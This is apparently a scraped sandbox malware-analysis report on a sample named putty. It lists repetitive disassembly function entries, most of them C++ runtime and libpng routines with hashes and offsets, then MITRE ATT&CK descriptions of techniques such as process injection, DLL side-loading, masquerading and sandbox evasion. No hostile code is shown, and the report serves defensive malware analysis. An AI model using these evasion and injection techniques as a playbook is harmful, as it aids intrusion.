Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_malloc_memmovestd::_std::exception::exception
String ID: \-@
API String ID: 1639587806-3423671737
Opcode ID: 42efb0154346e17e4222b9e0db79a25bf664b84846215c966737bd93ad10b78f
Instruction ID: bfc4c44ecf4657255dd122f31e7c04fc530ba565611494fd811950e856641ae3
Opcode Fuzzy Hash: 42efb0154346e17e4222b9e0db79a25bf664b84846215c966737bd93ad10b78f
Instruction Fuzzy Hash: B731B1B5900709EFCB10DF99D881A9AFBF4FF48714F10862EE5199B780D7B4AA05CB91

Function 00321B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00321B4B

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

std::_Xinvalid_argument.LIBCPMT ref: 00321B69

Strings

string too long, xrefs: 00321B46, 00321B64

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
String ID: string too long
API String ID: 3336028256-2556327735
Opcode ID: b1ffdab40781127ecf0f0b9a8cd674a8c5d45191fe75a90468b3ad64cd971039
Instruction ID: c59e0f80f7d3edde7e50895a99775b82b47073cc6e31d3e91f0a046595e777e9
Opcode Fuzzy Hash: b1ffdab40781127ecf0f0b9a8cd674a8c5d45191fe75a90468b3ad64cd971039
Instruction Fuzzy Hash: 4511DF333146245B5726EE6EF98086AF3EAFFF8720311062FF151D7650EBA0980583A4

Function 00321E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00321E97

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

_memmove.LIBCMT ref: 00321EE1

Strings

string too long, xrefs: 00321E92

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: string too long
API String ID: 22950630-2556327735
Opcode ID: e92e6961215a537fe92f5a05eb189906ab45a5d6bb38c69c3426983ec0f91292
Instruction ID: ddbdfe907d88fd6fc213a88eb8c511a6e35450f92a3e7d5fe73180ac9a23b9d8
Opcode Fuzzy Hash: e92e6961215a537fe92f5a05eb189906ab45a5d6bb38c69c3426983ec0f91292
Instruction Fuzzy Hash: 1611B432514320AAD725DE78FDC19ABB3A8BF707247110B2EE496C7541D771E84887A0

Function 00323870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00323884

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

std::_Xinvalid_argument.LIBCPMT ref: 0032389B

Strings

string too long, xrefs: 0032387F, 00323896

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
String ID: string too long
API String ID: 3336028256-2556327735
Opcode ID: c4cb3172a641b741d41d6a90acf327a605178b5c7b84fecb98edea473d067ae9
Instruction ID: 194e0cab4008f8b59f6a07627ec628c701ab27ab83b81bd11233899bd8a731fb
Opcode Fuzzy Hash: c4cb3172a641b741d41d6a90acf327a605178b5c7b84fecb98edea473d067ae9
Instruction Fuzzy Hash: B111E7723007604BD7339A2CA441B2AB7E9AFE1B10F11062EF1929F791C7B4994483A4

Function 00321DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00321E06

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

_memmove.LIBCMT ref: 00321E44

Strings

invalid string position, xrefs: 00321E01

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: f3b580b2e908afba15d7b45f2bfe217398f360a3d4d31f7ae598a17f132c5011
Instruction ID: 5e8162c2ec8ebbf9601f16325b84cd52c8acdbc535622dcaf09666619ec64f05
Opcode Fuzzy Hash: f3b580b2e908afba15d7b45f2bfe217398f360a3d4d31f7ae598a17f132c5011
Instruction Fuzzy Hash: EA11A9323106259B8726CE6CED8086AF3AAFFE4754321492ED581CBA15DB71E816C7E4

Function 00322D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00322D36

Part of subcall function 003B79B5: std::exception::exception.LIBCMT ref: 003B79CA
Part of subcall function 003B79B5: __CxxThrowException@8.LIBCMT ref: 003B79DF

_memmove.LIBCMT ref: 00322D6F

Strings

invalid string position, xrefs: 00322D31

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: d4f2922f8828649719906aab2d78ec55c72834e8737e3f3c275c99dae2abb968
Instruction ID: 55ababdcb2c2a532c41d8f91b231bb7bd54e0e40326b4c39a868f4fcb4b823f1
Opcode Fuzzy Hash: d4f2922f8828649719906aab2d78ec55c72834e8737e3f3c275c99dae2abb968
Instruction Fuzzy Hash: 2701DB313102206BD3269D6CFC80A6BB7AAEB91710B24492EE191CB741D7B0EC42C7A0

Function 00345C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

Potential overflow in png_zalloc(), xrefs: 00345C5D
Out of Memory, xrefs: 00345CA7

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID:
String ID: Out of Memory$Potential overflow in png_zalloc()
API String ID: 0-3380716175
Opcode ID: 2e60a8d7c3418e18886a2875aebb6217c101295d3b387cdcf359d4f4f05b72e7
Instruction ID: 8ba42df3fd30310fbf01642882d5e37b2fc514e20f7b77faec67226d3eb241b5
Opcode Fuzzy Hash: 2e60a8d7c3418e18886a2875aebb6217c101295d3b387cdcf359d4f4f05b72e7
Instruction Fuzzy Hash: D201F231A02B045B97169A79AC856AFF3D8EF50334B00063BFA69CA651DB60FD014650

Function 0033AB00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0033AB13

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

_memmove.LIBCMT ref: 0033AB3E

Strings

vector<T> too long, xrefs: 0033AB0E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: vector<T> too long
API String ID: 22950630-3788999226
Opcode ID: eb95a95e1b796a833651d2733004d6be14a6a898597bd41df6008477b0870cef
Instruction ID: acba2d500863a4242b817301f6f1099dfc535ce66742e3a4e769c944fd4e5236
Opcode Fuzzy Hash: eb95a95e1b796a833651d2733004d6be14a6a898597bd41df6008477b0870cef
Instruction Fuzzy Hash: 54018FB16002058FC724DFA8C8D2C6AB3E9EF543047144A3DE597D7741EA30F800CB61

Function 00342110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00342123

Part of subcall function 003B7968: std::exception::exception.LIBCMT ref: 003B797D
Part of subcall function 003B7968: __CxxThrowException@8.LIBCMT ref: 003B7992

_memmove.LIBCMT ref: 0034214A

Strings

vector<T> too long, xrefs: 0034211E

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: vector<T> too long
API String ID: 22950630-3788999226
Opcode ID: 4b685198a253eb730d0edd40315f8dc2df6ad7a0305f3d6b44b25a212df6817a
Instruction ID: f21c2cd56eb637226ec5feae1fc3b9e95be2ab54483d6831a57288bddd243282
Opcode Fuzzy Hash: 4b685198a253eb730d0edd40315f8dc2df6ad7a0305f3d6b44b25a212df6817a
Instruction Fuzzy Hash: 93014F716006059FD725DF6DC8C286BB3E9EB547147914A2DF596EBB81EA30F801CB60

Function 00344150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 0034419A
_fprintf.LIBCMT ref: 003441B0

Strings

libpng warning: %s, xrefs: 0034418C

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _fprintf
String ID: libpng warning: %s
API String ID: 1654120334-1776161082
Opcode ID: c7b5f33d37c100fe6ca5a857433bb6bea01175e2ee5d1a418afca91bd0407d0c
Instruction ID: c08b73ca47efb50b93c0eff3843f5a72c62e9b49e962ec1d53e1b97fb9a5183e
Opcode Fuzzy Hash: c7b5f33d37c100fe6ca5a857433bb6bea01175e2ee5d1a418afca91bd0407d0c
Instruction Fuzzy Hash: C0F0E9E6E016422EFB3376308C43BA665884B71304B0E4078E500CEA12EE8FE8C50212

Function 0032363C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?), ref: 00323640
__CxxThrowException@8.LIBCMT ref: 0032364A

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

Part of subcall function 00321A20: std::_Xinvalid_argument.LIBCPMT ref: 00321A39
Part of subcall function 00321A20: std::_Xinvalid_argument.LIBCPMT ref: 00321A5A
Part of subcall function 00321A20: std::_Xinvalid_argument.LIBCPMT ref: 00321A78
Part of subcall function 00321A20: _memmove.LIBCMT ref: 00321AEF

Strings

<no error description available>, xrefs: 00323651

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8FreeLocalRaiseThrow_memmove
String ID: <no error description available>
API String ID: 2869960171-55999512
Opcode ID: e92ba0cf86f186a929293a4fcc9deddfc1a794467332baea7f900a2222816d5e
Instruction ID: 9e4f05f581f31a46733f5f1861aa3518244e7417eea5ee258b08c6a7fb869bd0
Opcode Fuzzy Hash: e92ba0cf86f186a929293a4fcc9deddfc1a794467332baea7f900a2222816d5e
Instruction Fuzzy Hash: B6F0B472A242186BCB15EBE9FD56EEEB379EF89B10F00021EF6166A2C0DE351504CB50

Function 0032F5B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0032F5E6
__CxxThrowException@8.LIBCMT ref: 0032F5FB

Part of subcall function 003B964E: _malloc.LIBCMT ref: 003B9668

Strings

n,3, xrefs: 0032F5D8, 0032F5DB

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: n,3
API String ID: 4063778783-1005139328
Opcode ID: dd7fc5da7a8e7af0e366026e0ff30a483bfdc837bc0b72eb278cabb1e3a57ba4
Instruction ID: 1b7fc2174765abfac768b65758c3b56b1e378a6666def68696eab325524ab141
Opcode Fuzzy Hash: dd7fc5da7a8e7af0e366026e0ff30a483bfdc837bc0b72eb278cabb1e3a57ba4
Instruction Fuzzy Hash: BAE0E57080121A9ADB06FFE4AC05BEE7378EF00704F10063EEA1552590FBB09604C5A1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

